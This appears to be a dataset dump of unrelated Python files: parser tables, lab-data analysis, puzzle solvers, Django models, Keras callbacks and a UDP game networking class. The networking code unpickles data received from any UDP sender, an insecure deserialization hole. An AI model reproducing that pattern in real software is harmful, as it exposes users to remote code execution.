('escrituraAux -> CTE_STRING push_cte','escrituraAux',2,'p_escrituraAux','lexAndSyn.py',520),
('escrituraAux -> expresion COMA escrituraAux','escrituraAux',3,'p_escrituraAux','lexAndSyn.py',521),
('escrituraAux -> CTE_STRING push_cte COMA escrituraAux','escrituraAux',4,'p_escrituraAux','lexAndSyn.py',522),
('escrituraAux -> llamadaAFuncion','escrituraAux',1,'p_escrituraAux','lexAndSyn.py',523),
('expresion -> exp','expresion',1,'p_expresion','lexAndSyn.py',527),
('expresion -> exp comp exp quad_comp','expresion',4,'p_expresion','lexAndSyn.py',528),
('comp -> LOWERTHAN push_poper','comp',2,'p_comp','lexAndSyn.py',532),
('comp -> MORETHAN push_poper','comp',2,'p_comp','lexAndSyn.py',533),
('comp -> DIFFERENT push_poper','comp',2,'p_comp','lexAndSyn.py',534),
('comp -> DOUBLEEQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',535),
('comp -> LOWEREQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',536),
('comp -> MOREEQUAL push_poper','comp',2,'p_comp','lexAndSyn.py',537),
('quad_comp -> <empty>','quad_comp',0,'p_quad_comp','lexAndSyn.py',541),
('exp -> termino quad_term','exp',2,'p_exp','lexAndSyn.py',545),
('exp -> termino quad_term exp1','exp',3,'p_exp','lexAndSyn.py',546),
('exp1 -> PLUS push_poper exp','exp1',3,'p_exp1','lexAndSyn.py',550),
('exp1 -> MINUS push_poper exp','exp1',3,'p_exp1','lexAndSyn.py',551),
('quad_term -> <empty>','quad_term',0,'p_quad_term','lexAndSyn.py',555),
('quad_fact -> <empty>','quad_fact',0,'p_quad_fact','lexAndSyn.py',559),
('termino -> factor quad_fact','termino',2,'p_termino','lexAndSyn.py',563),
('termino -> factor quad_fact termino1','termino',3,'p_termino','lexAndSyn.py',564),
('termino1 -> TIMES push_poper termino','termino1',3,'p_termino1','lexAndSyn.py',568),
('termino1 -> DIVIDE push_poper termino','termino1',3,'p_termino1','lexAndSyn.py',569),
('factor -> LPAREN expresion RPAREN','factor',3,'p_factor','lexAndSyn.py',573),
('factor -> factorAux','factor',1,'p_factor','lexAndSyn.py',574),
('factorAux -> PLUS push_poper var_cte','factorAux',3,'p_factorAux','lexAndSyn.py',578),
('factorAux -> MINUS push_poper var_cte','factorAux',3,'p_factorAux','lexAndSyn.py',579),
('factorAux -> var_cte','factorAux',1,'p_factorAux','lexAndSyn.py',580),
('push_id -> <empty>','push_id',0,'p_push_id','lexAndSyn.py',584),
('push_cte -> <empty>','push_cte',0,'p_push_cte','lexAndSyn.py',588),
('push_poper -> <empty>','push_poper',0,'p_push_poper','lexAndSyn.py',598),
('var_cte -> ID push_id','var_cte',2,'p_var_cte','lexAndSyn.py',602),
('var_cte -> CTE_I push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',603),
('var_cte -> CTE_F push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',604),
('var_cte -> CTE_STRING push_cte','var_cte',2,'p_var_cte','lexAndSyn.py',605),
('var_cte -> arreglo','var_cte',1,'p_var_cte','lexAndSyn.py',606),
('var_cte -> matrix','var_cte',1,'p_var_cte','lexAndSyn.py',607),
]
|
7,984 | 19949b07c866d66b3ef00b6a386bf89f03e06294 | ############################## Import Modules ##################################
import pandas as pd
import numpy as np
import re
from scipy import stats
import matplotlib.pyplot as plt
############################## Define Functions ################################
# generate list containing data of standard curve
def process_std(standard_input_file):
try:
with open(standard_input_file, 'r') as in_handle:
lin_reg_lst = []
for line in in_handle:
line = line.strip('\n')
lin_reg_lst.append(line)
except IOError:
print("Could not open " + standard_input_file + " for reading.")
quit(1)
return lin_reg_lst
# generate info_dict containing information about the samples
def process_info(info_file):
try:
info_dict = {}
with open(info_file, 'r') as in_handle:
for line in in_handle:
line = line.strip()
items = re.split(' ', line)
well_lst = re.split(',', items[1])
info_dict[items[0]] = {'wells': well_lst,
'conc': float(items[2]),
'dil': float(items[3])}
except IOError:
print("Could not open " + args.info + " for reading.")
quit(1)
return info_dict
# calculate substrate concentration from absorption values
def abs_to_subconc(meas_df, info_dict, m, c):
# find data series belonging to a sample
for sample in info_dict.keys():
for well in info_dict[sample]['wells']:
i = np.where(meas_df == well)
# convert absorption values to substrate concentration
for row in meas_df[i[0]]:
count = 1
for el in row:
if type(el) != str:
conc = (el - c)/m
meas_df[i[0], count] = conc
count += 1
return meas_df
# process blank to get slope
def process_blank(blank_file, std_m, std_c):
blank_df = pd.read_csv(blank_file)
blank_df = blank_df.to_numpy()
# define x values
i = np.where(blank_df == 'Time [s]')
# fall-back for case that time per well is measured
if len(i[0]) == 0:
b_arr = []
i = np.where(blank_df == 'Time [ms]')
# convert ms to s
for row in blank_df[i[0]]:
count = 1
arr = []
for el in row:
if type(el) != str:
sec = el*0.001
arr.append(sec)
count += 1
b_arr.append(arr)
blank_x = np.vstack(b_arr)
# make average for time
av_lst = []
for row in np.transpose(blank_x):
av = sum(row) / len(row)
av_lst.append(av)
blank_x = np.transpose(np.array(av_lst))
else:
blank_x = np.array(blank_df[i[0]][0, 1:])
# define y values
arr = []
for row in blank_df:
if re.search(r'^[A-Z]\d\d?$', row[0]):
arr.append(row[1:])
if len(arr) < 2:
blank_arr = np.array(arr)
else:
blank_arr = np.vstack(arr)
count_r = 0
for row in blank_arr:
count_c = 0
for el in row:
if type(el) != str:
conc = (el - std_c)/std_m
blank_arr[count_r, count_c] = conc
count_c += 1
count_r += 1
av_lst = []
for row in np.transpose(blank_arr):
av = sum(row) / len(row)
av_lst.append(av)
if len(av_lst) < 2:
blank_y = np.transpose(np.array(av_lst))
else:
blank_y = np.transpose(np.vstack(av_lst))
b_m, b_c, b_r, b_p, stderr = stats.linregress(blank_x.astype(float),
blank_y.astype(float))
return b_m
# calculate average activity and standard deviation of each sample
def act_calc(meas_df, info_dict, b_m, std_m, std_c):
act_dict = {}
# m_lin defines most linear part from first point
while True:
print("How many time intervals you want to take for the "
+ "analysis? (most linear part from first to x)")
m_lin = input()
if m_lin.isnumeric() == True and int(m_lin) > 1:
break
m_lin = int(m_lin)
# define volume per well
while True:
print("What is the volume per well? (in µL)")
well_v = input()
print("\n")
if well_v.isnumeric() == True:
break
# define x values
time = np.where(meas_df == 'Time [s]')
# fall-back for case that time per well is measured
if len(time[0]) == 0:
m_arr = []
time = np.where(meas_df == 'Time [ms]')
# convert ms to s
for row in meas_df[time[0]]:
arr = []
count = 1
for el in row:
if type(el) != str:
sec = el*0.001
arr.append(sec)
count += 1
m_arr.append(arr)
x = np.vstack(m_arr)
# make average for time values
av_lst = []
for row in np.transpose(x):
av = sum(row) / len(row)
av_lst.append(av)
x = np.transpose(np.array(av_lst[0:m_lin]))
else:
x = meas_df[time[0]]
x = np.array(x[0, 1:m_lin + 1])
# process sample data
for sample in info_dict.keys():
e_conc = info_dict[sample]['conc']
e_dil = info_dict[sample]['dil']
e_conc = float(e_conc)/ (float(e_dil)*1000)
for well in info_dict[sample]['wells']:
i = np.where(meas_df == well)
y = meas_df[i[0]]
y = np.array(y[0, 1:m_lin + 1])
m, c, r, p, stderr = stats.linregress(x.astype(float),
y.astype(float))
print(sample + ' >R²' + str(r))
# plot substrate decrease
plt.figure(1, figsize=[10,5], frameon=False)
plt.plot(x, y, 'x', markersize=2, label=sample)
plt.plot(x, m*x + c, 'r', linestyle='--', color='gray')
plt.savefig('activity_plot.png')
# calculate specific activity
m = abs(m - b_m)
sact = (m*60*int(well_v)) / (10*1000000*float(e_conc))
act_dict.setdefault(sample, [])
act_dict[sample].append(sact)
# calculate average specific activity per sample
summery_dict = {}
summery_dict['interval'] = m_lin
for sample in act_dict.keys():
av_sact = sum(act_dict[sample]) / len(act_dict[sample])
print("average specific activity of " + sample + " = "
+ str(av_sact) + " U/mg")
# calculate standard deviation per sample
std = np.std(act_dict[sample])
print("standard deviation for " + sample + ": +/-" + str(std))
# generate summery_dict for output file
summery_dict[sample] = {'av_sact': av_sact, 'std': std}
return summery_dict
# process summery_dict to generate output file
def gen_output(summery_dict, name):
try:
with open(name + '_activity.out', 'w') as out_handle:
out_handle.write('time interval from 1. to '
+ str(summery_dict['interval'])
+ '. was used for calculations.\n')
for sample in summery_dict.keys():
if sample == 'interval':
continue
else:
out_handle.write(str(sample) + ': s = '
+ str(summery_dict[sample]['av_sact'])
+ ' +/- '
+ str(summery_dict[sample]['std']) + '\n')
except IOError:
print("Could not open activity.out for writing.")
quit(1)
|
7,985 | a5eb1f559972519dbe0f3702e03af77e61fbfb4e | #!/usr/bin/env python3
import sys
import re
from collections import namedtuple
def isnum(name):
return name.startswith('-') or name.isdigit()
class WireValues:
def __init__(self):
self.wires = {}
def __getitem__(self, name):
return int(name) if isnum(name) else self.wires[name]
def __setitem__(self, name, value):
self.wires[name] = value
def __contains__(self, name):
return isnum(name) or name in self.wires
Command = namedtuple('Command', 'pattern function')
WireLink = namedtuple('WireLink', 'command inputs output')
COMMANDS = []
def make_command(expr):
pattern = re.compile('^'+expr.replace('#', '([0-9a-z]+)')+'$')
def command_maker(function):
command = Command(pattern, function)
COMMANDS.append(command)
return command
return command_maker
@make_command('# -> #')
def assignment(wires, v1, name):
wires[name] = wires[v1]
@make_command('# AND # -> #')
def anding(wires, v1, v2, name):
wires[name] = wires[v1] & wires[v2]
@make_command('# OR # -> #')
def oring(wires, v1, v2, name):
wires[name] = wires[v1] | wires[v2]
@make_command('# LSHIFT # -> #')
def lshift(wires, v1, v2, name):
wires[name] = wires[v1] << wires[v2]
@make_command('# RSHIFT # -> #')
def rshift(wires, v1, v2, name):
wires[name] = wires[v1] >> wires[v2]
@make_command('NOT # -> #')
def notting(wires, v1, name):
wires[name] = ((1<<16)-1)&~wires[v1]
def create_link(line):
for cmd in COMMANDS:
m = re.match(cmd.pattern, line)
if m:
gps = m.groups()
return WireLink(cmd, gps[:-1], gps[-1])
raise ValueError(repr(line))
def process_links(links):
wires = WireValues()
while links:
remaining = []
for link in links:
if all(i in wires for i in link.inputs):
link.command.function(wires, *link.inputs, link.output)
else:
remaining.append(link)
links = remaining
return wires
def main():
lines = sys.stdin.read().strip().split('\n')
links = [create_link(line) for line in lines]
wires = process_links(links)
answer = wires['a']
print("Part 1 wire a:", answer)
index = next(i for (i,link) in enumerate(links) if link.output=='b')
links[index] = WireLink(assignment, [str(answer)], 'b')
wires = process_links(links)
answer = wires['a']
print("Part 2 wire a:", answer)
if __name__ == '__main__':
main()
|
7,986 | 5bdc08b66916959d462314b8a6e5794e5fa12b55 | import os
import pathlib
import enum
import warnings
import colorama
import requests
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=DeprecationWarning)
import invoke
class MoleculeDriver(enum.Enum):
docker = 1
lxd = 2
vagrant = 3
class TestPlatform(enum.Enum):
linux = 1
ubuntu = 2
centos = 3
def print_header(header_text):
print(
colorama.Fore.CYAN + colorama.Style.BRIGHT +
f" {header_text} ".center(80, "=") +
colorama.Style.RESET_ALL
)
def print_sub_header(sub_header_text):
print(
colorama.Fore.CYAN + colorama.Style.BRIGHT + "--" +
f" {sub_header_text} ".ljust(78, "-") +
colorama.Style.RESET_ALL
)
def print_success_message(success_message_text):
print(
colorama.Fore.GREEN + colorama.Style.BRIGHT +
f" {success_message_text}: Success ".center(80, "=") +
colorama.Style.RESET_ALL
)
def run_command(context, *args, **kwargs):
try:
return context.run(*args, **kwargs)
except invoke.exceptions.Failure:
print(
colorama.Fore.RED + colorama.Style.BRIGHT +
"Failure: error executing '" + args[0] + "' command" +
colorama.Style.RESET_ALL
)
raise
def get_base_config_path(driver_code, platform_code):
base_config = "molecule/molecule_base_{driver}_{platform}.yml".format(
driver=driver_code.name, platform=platform_code.name
)
return str(pathlib.Path(__file__).resolve().parent / base_config)
def get_molecule_scenarios(context):
scenarios = []
for child_obj in (pathlib.Path.cwd() / "molecule").iterdir():
if child_obj.is_dir():
if (child_obj / "molecule.yml").exists():
scenarios.append(child_obj.name)
return sorted(scenarios)
def run_molecule(context, command, scenario, driver, platform="linux", env={}):
driver_code = MoleculeDriver[driver.lower()]
platform_code = TestPlatform[platform.lower()]
molecule_env = env.copy()
if driver_code == MoleculeDriver.lxd:
molecule_env.update({"MOLECULE_USER_NAME": "root"})
elif driver_code == MoleculeDriver.vagrant:
molecule_env.update({"MOLECULE_USER_NAME": "vagrant"})
molecule_command = (
f"molecule --base-config {get_base_config_path(driver_code, platform_code)} {command}"
)
if scenario is not None:
molecule_command += f" -s {scenario}"
run_command(context, molecule_command, env=molecule_env, echo=True)
def get_parameter_value(host, ansible_var_name, param_value, default_value):
if host.backend.HAS_RUN_ANSIBLE:
ansible_var_value = host.ansible.get_variables().get(ansible_var_name, None)
else:
ansible_var_value = None
return_value = ansible_var_value if param_value is None else param_value
if return_value is None:
return_value = default_value
return return_value
def get_github_release_info(release_url):
if "AO_GITHUB_OAUTH_TOKEN" in os.environ:
headers = {"Authorization": "token " + os.environ["AO_GITHUB_OAUTH_TOKEN"]}
else:
headers = None
return requests.get(
"https://api.github.com/repos/" + release_url, headers=headers
).json()
|
7,987 | f8635c815b375dc77e971d4ea0f86547215ab2f9 | __author__ = 'GazouillisTeam'
import numpy as np
import os
import sys
import time
from keras.callbacks import Callback
def save_architecture(model, path_out):
"""
Based on the keras utils 'model.summary()'
"""
# Redirect the print output the a textfile
orig_stdout = sys.stdout
# and store the architecture
f = file(os.path.join(path_out, "architecture.txt"), 'w')
sys.stdout = f
model.summary()
# Reset the print output direction
sys.stdout = orig_stdout
f.close()
open(os.path.join(path_out, "config.json"), 'w').write(model.to_json())
def create_log(path, settings, filename="log.txt"):
f = open(os.path.join(path, filename), "w")
f.writelines(str(settings))
f.writelines("\n####\nStarted on %s at %s\n" % (time.strftime("%d/%m/%Y"), time.strftime("%H:%M:%S")))
f.close()
def write_log(path, string, filename="log.txt"):
"""
Add a line at the end of a textfile.
:param path: textfile location
:param string: line to add
"""
# Open and Read
f = open(os.path.join(path, filename), "r")
lines = f.readlines()
f.close()
# Adding a line
lines.append(string)
# Write
f = open(os.path.join(path, filename), "w")
f.writelines(lines)
f.close()
class ModelSaver(Callback):
"""
Keras callback subclass which defines a saving procedure of the model being trained : after each epoch,
the last model is saved under the name 'after_random.cnn'. The best model is saved with the name 'best_model.cnn'.
The model after random can also be saved. And the model architecture is saved with the name 'config.network'.
Everything is stored using pickle.
"""
def __init__(self, path, path_weights, monitor, verbose=1, h5py=False):
super(Callback, self).__init__()
self.verbose = verbose
self.path = path
self.path_weights = path_weights
self.monitor = monitor
self.best = np.Inf
self.h5py = h5py
def save_weights(self, path):
if not self.h5py: # H5PY not available : save weights using np.save
w = self.model.get_weights()
np.save(path+".npy", w)
else:
self.model.save_weights(path + ".h5py", overwrite=True)
def on_epoch_begin(self, epoch, logs={}):
self.epoch_start = time.time()
# Saving weights just after initialization
if epoch == 0:
save_path = os.path.join(self.path_weights, "after_initialization")
self.save_weights(save_path)
def on_epoch_end(self, epoch, logs={}):
self.epoch_end = time.time()
# get loss
monitor = logs.get(self.monitor)
# condition = True if loss decreased
condition = monitor < self.best
if condition:
# Save weights as "best_model.weights"
self.best = monitor
save_path = os.path.join(self.path_weights, "best_model")
self.save_weights(save_path)
else:
# Save weights as "last_epoch.weights"
save_path = os.path.join(self.path_weights, "last_epoch")
self.save_weights(save_path)
# Log file management
if self.verbose > 0:
log_string = "####\nEpoch %d took %d s: " % (epoch, int(self.epoch_end-self.epoch_start))
for k in logs.keys():
log_string += "%s : %.4f # " % (k, logs.get(k))
if condition:
log_string += "\tBEST"
write_log(self.path, log_string)
def trainargs2strings(path, model, dataset, index_train, index_valid, D, batch_size,
nsamples_per_epoch, nepoch, patience, lr):
settings = ""
settings += "Path : %s"%path
settings += "\nDataset shape :" + str(dataset.shape)
settings += "\nNtrain : %d"%len(index_train)
settings += "\nNvalid : %d"%len(index_valid)
settings += "\nDim : %d"%D
settings += "\nBatch size : %d"%batch_size
settings += "\nNb samples per epoch : %d"%nsamples_per_epoch
settings += "\nNb epochs : %d"%nepoch
settings += "\nPatience : %d"%patience
settings += "\nLR : %.5f"%lr
return settings |
7,988 | 192e789129a51aa646a925fc4f8c3f8f4e14d478 | import datetime
from random import SystemRandom
import re
import string
import time
from django.db import models
from django.utils import timezone
from app.translit import translit
# Each model extends models.Model
class alumni(models.Model):
alumnus_id = models.AutoField(primary_key=True)
full_name = models.CharField(max_length=150)
year = models.IntegerField()
letter = models.CharField(max_length=2)
add_time = models.DateTimeField(auto_now_add=True)
added_by = models.CharField(max_length=50)
class Meta:
verbose_name = 'Alumnus'
verbose_name_plural = 'Alumni'
def __unicode__(self):
return self.full_name + ", " + unicode(self.year) + self.letter
class Application(models.Model):
slug = models.SlugField()
name = models.CharField(max_length=200)
url = models.URLField()
disabled = models.BooleanField(default=False)
valid_for = models.PositiveIntegerField()
def __unicode__(self):
return self.slug
class invites(models.Model):
PREFIX = '57'
STRENGTH = 16
STATUS_OK = 1
STATUS_DISABLED = 2
STATUS_BANNED = 3
STATUSES = (
(1, 'OK'),
(2, 'DISABLED'),
(3, 'BANNED'),
)
code = models.CharField(max_length=255)
alumni = models.ForeignKey(alumni)
application = models.ForeignKey(Application, null=True, blank=True)
add_time = models.DateTimeField(auto_now_add=True)
status = models.SmallIntegerField(choices=STATUSES, default=STATUS_OK)
disabled_at = models.DateTimeField(null=True, blank=True)
expires_at = models.DateTimeField(null=True, blank=True)
used_at = models.DateTimeField(null=True, blank=True)
@classmethod
def temporary_for(cls, invite, application, valid_for, session):
try:
new_code = invite_links.objects.get(
code_from_id=invite.id,
is_temporary_for=True,
code_to__application_id=application.id
).code_to
if valid_for is not None:
new_code.ensure_expires_after(valid_for)
return new_code
except invite_links.DoesNotExist:
pass
if valid_for is None:
valid_for = application.valid_for
expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)
new_code = invites(application=application, alumni_id=invite.alumni_id, expires_at=expires_at, used_at=datetime.datetime.now())
new_code.code += '-' + application.slug
new_code.save()
link = invite_links(code_from=invite, code_to=new_code, session=session, is_temporary_for=True)
link.save()
return new_code
def __init__(self, *args, **kwargs):
super(invites, self).__init__(*args, **kwargs)
if not self.code and self.alumni_id:
code = [self.PREFIX, str(self.alumni.year) + translit(self.alumni.letter).lower()]
full_name = re.sub(r'\([^)]*\)\s+', '', self.alumni.full_name)
surname, name = full_name.split(' ', 1)
code.append(translit(surname[:3]).lower() + translit(name[0]).lower())
csprng = SystemRandom()
code.append(''.join(csprng.choice(string.digits) for _ in range(self.STRENGTH)))
self.code = "-".join(code)
class Meta:
verbose_name = 'Invite'
verbose_name_plural = 'Invites'
def __unicode__(self):
return unicode(self.code) + " (" + unicode(self.alumni) + ")"
def safe_form(self):
code = self.code[:-self.STRENGTH] + 'x' * (self.STRENGTH-4) + self.code[-4:]
return unicode(code)
def is_enabled(self):
return self.status == self.STATUS_OK
def is_temporary(self):
return self.application_id is not None
def disable(self, at=None):
if at is None:
at = timezone.now()
self.status = self.STATUS_DISABLED
if at > timezone.now():
at = timezone.now()
if self.disabled_at is None or self.disabled_at > at:
self.disabled_at = at
def merge_to(self, other_code, session):
link = invite_links(code_from=self, code_to=other_code, is_merged_to=True, session=session)
link.save()
def verbose_status(self):
if self.status == self.STATUS_OK:
return 'ok'
if self.status == self.STATUS_DISABLED:
return 'disabled'
if self.status == self.STATUS_BANNED:
return 'banned'
return None
def expires_at_timestamp(self):
if self.expires_at is not None:
return time.mktime(self.expires_at.timetuple())
return None
def ensure_expires_after(self, valid_for):
expires_at = datetime.datetime.now() + datetime.timedelta(seconds=valid_for)
if expires_at > self.expires_at:
self.expires_at = expires_at
self.save()
class invite_links(models.Model):
code_to = models.ForeignKey(invites, related_name="invite_links_to")
code_from = models.ForeignKey(invites, related_name="invite_links_from")
is_issued_by = models.BooleanField(default=False)
is_merged_to = models.BooleanField(default=False)
is_temporary_for = models.BooleanField(default=False)
add_time = models.DateTimeField(auto_now_add=True)
session = models.CharField(max_length=100, null=True, blank=True)
class Meta:
verbose_name = 'Invite link'
verbose_name_plural = 'Invite links'
def __unicode__(self):
return unicode(self.code_from) + " -> " + unicode(self.code_to)
# class Usage(models.Model):
# code = models.ForeignKey(invites)
|
7,989 | e35dbcdef8779ffabc34b5e5c543e35b29523971 | #!/usr/bin/env python3
import pandas
from matplotlib import pyplot as plt
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import AdaBoostRegressor
import numpy as np
from sklearn.metrics import mean_absolute_error, mean_squared_error
from math import sqrt
def main():
df = pandas.read_csv("2016Q1")
df = df.append(pandas.read_csv("2016Q2"))
df = df.append(pandas.read_csv("2016Q3"))
df = df.append(pandas.read_csv("2016Q4"))
test = pandas.read_csv("2017Q1")
test = test.append(pandas.read_csv("2017Q2"))
test = test.append(pandas.read_csv("2017Q3"))
test = test.append(pandas.read_csv("2017Q4"))
#make_scatter(df)
train_predict_1d(df, test)
#train_predict_2d(df, test)
return
def make_scatter(df):
plt.figure(figsize=(8,6))
plt.plot(df['Start station number'], df['Counts'], 'o')
plt.xlabel('Station')
plt.ylabel('Counts')
plt.show()
return
def train_predict_1d(df, test):
regressor = DecisionTreeRegressor(max_depth=2)
regressor.fit(np.array([df['Start station number']]).T, df['Counts'])
xx = np.array([test['Start station number']]).T
plt.figure(figsize=(8,6))
plt.plot(df['Start station number'], df['Counts'], 'o', label='observation')
plt.plot(xx, regressor.predict(xx), linewidth=4, alpha=.7, label='prediction')
plt.xlabel('Station')
plt.ylabel('Counts')
plt.legend()
#plt.show()
print("RMSE")
print(sqrt(mean_squared_error(test['Counts'], regressor.predict(xx))))
return
def train_predict_2d(df, test):
#regressor = AdaBoostRegressor(DecisionTreeRegressor(max_depth=10), n_estimators=50, loss="square")
regressor = DecisionTreeRegressor()
regressor.fit(df[['Start station number', 'Quarter']], df['Counts'])
nx = 30
ny = 30
x_station = np.linspace(30800,32300, nx)
y_day = np.linspace(0, 3, ny)
xx, yy = np.meshgrid(x_station, y_day)
z_counts = regressor.predict(np.array([xx.flatten(), yy.flatten()]).T)
zz = np.reshape(z_counts, (nx, ny))
fig = plt.figure(figsize=(8, 8))
plt.pcolormesh(x_station, y_day, zz, cmap=plt.cm.YlOrRd)
plt.colorbar(label='bikes predicted')
#plt.scatter(test['Start station number'], test['Counts'], s=test['Counts']/25.0, c='g')
plt.xlim(np.min(x_station), np.max(x_station))
plt.ylim(np.min(y_day), np.max(y_day))
plt.xlabel('Start station number')
plt.ylabel('Quarter')
#plt.show()
#fig.savefig("2d_prediction_quarter")
print("Mean Absolute Error")
print(mean_absolute_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']])))
print("RMSE")
print(sqrt(mean_squared_error(test['Counts'], regressor.predict(test[['Start station number', 'Quarter']]))))
return
if __name__ == "__main__":
main()
|
7,990 | b883e63c70f3dfeac3294989fab93c1331b6329c | import zipfile, re
f = zipfile.ZipFile("channel.zip")
num = '90052'
comments = []
while True:
content = f.read(num + ".txt").decode("utf-8")
print(content)
comments.append(f.getinfo(num + ".txt").comment.decode("utf-8"))
match = re.search("Next nothing is (\d+)", content)
if match == None:
break
num = match.group(1)
print("".join(comments))
url = "http://www.pythonchallenge.com/pc/def/hockey.html"
print(url)
# look at the letters that make the ascii art : they are : O makes h, x makes o, g makes k, e makes e, n makes y
print("http://www.pythonchallenge.com/pc/def/oxygen.html") |
7,991 | 6e3de57f7c65e9f6195dabc3326b05744249cefe | # -*- coding: utf-8 -*-
"""Form content type."""
from briefy.plone.content.interfaces import IBriefyContent
from plone.dexterity.content import Container
from zope.interface import implementer
class IForm(IBriefyContent):
"""Interface for a Composite Page."""
@implementer(IForm)
class Form(Container):
"""A Form."""
|
7,992 | b7be9fd366d03068a5d6c3cee703d579b9866fd3 | DEFAULT_SERVER_LISTEN_PORT = 2011
DEFAULT_CLIENT_LISTEN_PORT = 2012
import pickle
import socket
from player import Player
from averageddata import *
import zlib
import g
import pygame
from collections import defaultdict
from periodic import Periodic
import random
from projectile import Projectile
TICKTIME = 0.05
class NetCommon:
netEntities = { "player": Player, "projectile":Projectile }
def __init__(self, listenPort):
#Make a UDP socket
self.sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )
self.sock.bind( ("0.0.0.0", listenPort) )
self.sock.settimeout(0.01)
self.packetSize = 0
self.t = 0
self.buf = ""
self.packetTimestamps = []
self.packetsPerSecond = 0
self.simulatedLatency = 0
self.simulatedRandomLatencyVal = 0
self.simulatedPacketloss = 0
self.simulatedRandomLatency = 0
self.simulatedPackets = []
self.packet_outbound_last_id = defaultdict(lambda:0)
self.packet_inbound_last_id = defaultdict(lambda:0)
self.packetloss = defaultdict(lambda:0)
self.ensured_send_packet_ids = defaultdict(lambda:0)
self.ensured_sent_packets = defaultdict(dict)
self.ensured_recv_packet_ids = defaultdict(lambda:-1)
self.ensured_packets_received_early = defaultdict(list)
self.resend_unconfirmed_timer = 0
self.averagedData = AveragedData()
self.netinfotimer = 1.0
self.debug_lines = []
self.periodic = Periodic()
self.periodic.add(self.resendUnconfirmed, 0.5)
def readPacket(self, info, data):
self.averagedData.add(self.t, "packets")
self.averagedData.add(self.t, "packetsize", len(data))
unpacked = pickle.loads(zlib.decompress(data))
addr, port = info
addrportstr = addr + ":" + str(port)
if "ensured_id" in unpacked:
if unpacked["ensured_id"] == self.ensured_recv_packet_ids[addrportstr]+1:
print "recv " + str(unpacked["ensured_id"])
self.ensured_recv_packet_ids[addrportstr] += 1
self.sendReceipt(addr, port, unpacked["ensured_id"])
elif unpacked["ensured_id"] < self.ensured_recv_packet_ids[addrportstr]+1:
print unpacked
print "got ensured packet twice; resending receipt for " + str(unpacked["ensured_id"])
self.sendReceipt(addr, port, unpacked["ensured_id"])
return []
else:
print "got packet " + str(unpacked["ensured_id"]) + " before " + str(self.ensured_recv_packet_ids[addrportstr]+1)
self.ensured_packets_received_early[addrportstr].append(unpacked)
return []
allPackets = []
to_remove = []
self.ensured_packets_received_early[addrportstr].sort(lambda a,b:cmp(a["ensured_id"], b["ensured_id"]))
for p in self.ensured_packets_received_early[addrportstr]:
print "resolving old " + str(p["ensured_id"])
if p["ensured_id"] <= self.ensured_recv_packet_ids[addrportstr]+1:
self.ensured_recv_packet_ids[addrportstr] += 1
self.sendReceipt(addr, port, p["ensured_id"])
allPackets.extend(self.readUnpackedPacket(p, addrportstr))
to_remove.append(p)
for p in to_remove:
self.ensured_packets_received_early[addrportstr].remove(p)
allPackets.extend(self.readUnpackedPacket(unpacked, addrportstr))
return allPackets
def sendReceipt(self, addr, port, q):
self.sendPacket({"type":"confirmReceipt","other_ensured_id":q}, addr, port)
def readUnpackedPacket(self, unpacked, addrportstr):
pid = unpacked["packet_id"]
lid = self.packet_inbound_last_id[addrportstr]
if pid > lid + 1:
self.packetloss[addrportstr] += 1
self.packet_inbound_last_id[addrportstr] = pid
if self.packet_inbound_last_id[addrportstr] > 0:
packetloss = self.packetloss[addrportstr] / float(self.packet_inbound_last_id[addrportstr])
self.averagedData.add(self.t, "packetloss_" + addrportstr, packetloss)
return [unpacked]
def sendPacket(self, data, addr, port):
print "packet: " + data["type"]
addrportstr = addr + ":" + str(port)
data["packet_id"] = self.packet_outbound_last_id[addrportstr]
self.packet_outbound_last_id[addrportstr] += 1
self.sock.sendto(zlib.compress(pickle.dumps(data, 2)), (addr, port))
def sendEnsuredPacket(self, data, addr, port):
addrportstr = addr + ":" + str(port)
ensured_id = self.ensured_send_packet_ids[addrportstr]
print "packet: " + data["type"] + " (ensured id: " + str(ensured_id) + ")"
data["packet_id"] = self.packet_outbound_last_id[addrportstr]
self.packet_outbound_last_id[addrportstr] += 1
data["ensured_id"] = ensured_id
cdata = zlib.compress(pickle.dumps(data, 2))
sent = {
"id":ensured_id,
"data":cdata,
"time":self.t,
"info":(addr,port)
}
self.ensured_sent_packets[addrportstr][ensured_id] = sent
self.sock.sendto(cdata, (addr, port))
self.ensured_send_packet_ids[addrportstr] = ensured_id + 1
def process_confirmReceipt(self, data, game, info):
(addr, port) = info
addrportstr = addr + ":" + str(port)
pending_packets = self.ensured_sent_packets[addrportstr]
pid = data["other_ensured_id"]
print "got receipt for " + str(pid)
if pid in pending_packets:
del pending_packets[pid]
else:
if pid > self.ensured_send_packet_ids:
print "got receipt for packet i haven't sent yet!!"
def update(self, game, dt):
self.game = game
self.t = pygame.time.get_ticks() / 1000.0
self.periodic.update()
self.packetsPerSecond = self.averagedData.get_ct(self.t, "packets", 1.0)
self.packetSize = self.averagedData.get_sum(self.t, "packetsize", 1.0)
allPackets = []
try:
(data, info) = self.sock.recvfrom(4096)
#self.packetSize = len(data)
if self.simulatedPacketloss > 0 and random.random() < self.simulatedPacketloss:
pass
else:
allPackets = self.readPacket(info, data)
except socket.timeout:
pass
except socket.error as err:
#print err
pass
#print self.simulatedPackets
if self.simulatedLatency == 0:
for d in allPackets:
self.process(d, game, info)
else:
off = self.simulatedLatency + self.simulatedRandomLatency * random.random()
self.simulatedPackets.extend( [(d, off, info) for d in allPackets] )
thisFramePackets = [ s for s in self.simulatedPackets if s[1] <= 0]
self.simulatedPackets = [ s for s in self.simulatedPackets if s[1] > 0 ]
for (p, t, info) in thisFramePackets:
self.process(p, game, info)
self.simulatedPackets = [ (s[0], s[1] - dt, s[2]) for s in self.simulatedPackets ]
def resendUnconfirmed(self):
for k,packets in self.ensured_sent_packets.items():
for i,packet in packets.items():
if self.t > packet["time"] + 1.5:
print "resending unreceipted packet: " + str(packet["id"])
self.sock.sendto(packet["data"], packet["info"])
def process(self, data, game, info):
if(hasattr(self, "process_" + data["type"])):
f = getattr(self, "process_" + data["type"])
f(data, game, info)
else:
print("Got packet of type '" + data["type"] + "' but there is no process_" + data["type"] + " method to handle it." )
|
7,993 | c7881c0d06600a43bdc01f5e464127c596db6713 | import unittest
from datetime import datetime
